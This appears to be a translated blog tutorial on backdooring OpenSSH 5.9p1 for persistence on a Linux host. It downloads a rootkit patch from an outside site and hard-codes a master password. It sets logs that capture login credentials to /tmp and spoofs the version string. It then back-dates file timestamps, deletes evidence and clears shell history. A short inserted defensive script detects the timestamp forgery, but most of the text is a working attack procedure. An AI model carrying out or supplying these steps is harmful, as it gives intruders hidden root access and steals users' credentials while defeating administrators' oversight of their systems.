Preface
Recompiling SSH on Linux with a built-in master password to maintain persistence
Download dependencies
```bash
yum install gcc gcc-c++ make patch
yum install openssl openssl-devel pam-devel zlib zlib-devel
```
Download the SSH 5.9p1 source
```bash
wget https://mirror.aarnet.edu.au/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
tar -xzvf openssh-5.9p1.tar.gz
```
Download the patch
```bash
wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz
```
Apply the patch to the SSH source
```bash
cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1
cd openssh-5.9p1
patch < sshbd5.9p1.diff
```
Rename the original SSH files
```bash
mv /usr/sbin/sshd /usr/sbin/sshd.bak
mv /etc/ssh/ssh_config /etc/ssh/ssh_config.bak
mv /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
```
Modify the new SSH source
Add the master password
- Edit line 179 of the openssh-5.9p1/includes.h file
```c
#define SECRETPW "<password>"
```
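Change the log directory
- Edit line 177 of the openssh-5.9p1/includes.h file, which defines the log that records other people's access to this host
```c
#define ILOG "/tmp/ilog"
```
- Edit line 178 of the openssh-5.9p1/includes.h file, which defines the log that records your own access to other hosts
```c
#define ILOG "/tmp/olog"
```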
Make the version match the original SSH
Check the original SSH version
Edit the configuration file
- Edit line 3 of the openssh-5.9p1/version.h file
```c
#define SSH_VERSION "<version>"
```
Compile and install
```bash
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
make
make install
```
Modify the timestamps
```bash
touch -r /usr/sbin/sshd.bak /usr/sbin/sshd
touch -r /etc/ssh/ssh_config.bak /etc/ssh/ssh_config
touch -r /etc/ssh/sshd_config.bak /etc/ssh/sshd_config
```
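From the defender's side, the timestamp step above leaves a trace: `touch -r` copies atime and mtime from the reference file, but ctime is set by the kernel and still shows when the file was really changed. The following triage script is an added example, not part of the original post; the function names and the one-hour slack are assumptions, and because package installs also leave ctime later than mtime, a hit should be confirmed with package verification such as `rpm -V openssh-server`.

```bash
#!/bin/sh
# Added example (not from the original post): flag files whose mtime looks
# back-dated relative to ctime. Requires GNU stat (coreutils).
# Function names and the default slack are assumptions made for this example.

# ctime_gap FILE -> prints (ctime - mtime) in seconds
ctime_gap() {
    local mtime ctime
    mtime=$(stat -c %Y -- "$1") || return 2
    ctime=$(stat -c %Z -- "$1") || return 2
    echo $(( ctime - mtime ))
}

# is_backdated FILE [SLACK_SECONDS]
# Exit 0 when ctime exceeds mtime by more than the slack (default 3600 s).
is_backdated() {
    local gap
    gap=$(ctime_gap "$1") || return 2
    [ "$gap" -gt "${2:-3600}" ]
}

# report_backdated FILE...
# Prints one SUSPECT line per flagged file with both timestamps for the analyst.
report_backdated() {
    local f
    for f in "$@"; do
        if [ ! -e "$f" ]; then
            echo "MISSING  $f"
            continue
        fi
        if is_backdated "$f"; then
            printf 'SUSPECT  %s  mtime=%s  ctime=%s\n' "$f" \
                "$(stat -c %y -- "$f")" "$(stat -c %z -- "$f")"
        fi
    done
    return 0
}

# Stand-alone use: pass the files to check, for example
#   sh check_ctime.sh /usr/sbin/sshd /etc/ssh/ssh_config /etc/ssh/sshd_config
if [ "$#" -gt 0 ]; then
    report_backdated "$@"
fi
```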
Clean up
Remove the bak files
```bash
rm /usr/sbin/sshd.bak
rm /etc/ssh/ssh_config.bak
rm /etc/ssh/sshd_config.bak
```
Clear the shell history
Remove the new SSH source
```bash
rm -f openssh-5.9p1.tar.gz 0x06-openssh-5.9p1.patch.tar.gz
rm -rf openssh-5.9p1 openssh-5.9p1.patch
```
Keep the SSH service enabled at boot
Reboot the system for the changes to take effect
Done
References
WeChat official account: 博文视点Broadview